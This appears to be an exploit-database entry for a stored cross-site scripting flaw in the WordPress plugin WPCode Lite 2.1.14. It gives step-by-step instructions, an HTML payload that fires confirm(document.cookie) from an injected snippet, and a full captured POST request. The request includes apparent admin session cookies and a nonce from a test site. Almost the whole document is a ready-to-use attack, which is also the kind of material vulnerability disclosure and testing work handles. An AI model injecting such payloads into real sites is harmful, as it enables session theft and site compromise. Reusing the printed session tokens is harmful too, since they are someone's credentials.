Share
## https://sploitus.com/exploit?id=PACKETSTORM:179279
# Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS  
# Date: 2024-06-30  
# Exploit Author: tmrswrr  
# Category : Webapps  
# Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin  
# Version 2.1.14  
  
  
### Steps to Execute the Payload:  
  
1. **Access the Admin Panel:**  
- Navigate to the admin panel of your WordPress site.  
- Go to `Code Snippets > `Edit Snippet` via the following URL:   
```  
https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10  
```  
  
2. **Insert the Payload:**  
- In the **Code Preview** section, insert the following payload:  
```  
"><img src=x onerrora=confirm() onerror=confirm(document.cookie)>  
```  
  
3. **Save and Verify:**  
- Active , Save the changes.  
- Navigate to the main page of your site:  
```  
https://127.0.0.1/  
```  
- You should see the payload executed.  
  
Post Request :  
  
POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2  
Host: 127.0.0.1  
Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3Dhtml  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 673  
Origin: https://vagabondcreature.s3-tastewp.com  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
  
wpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error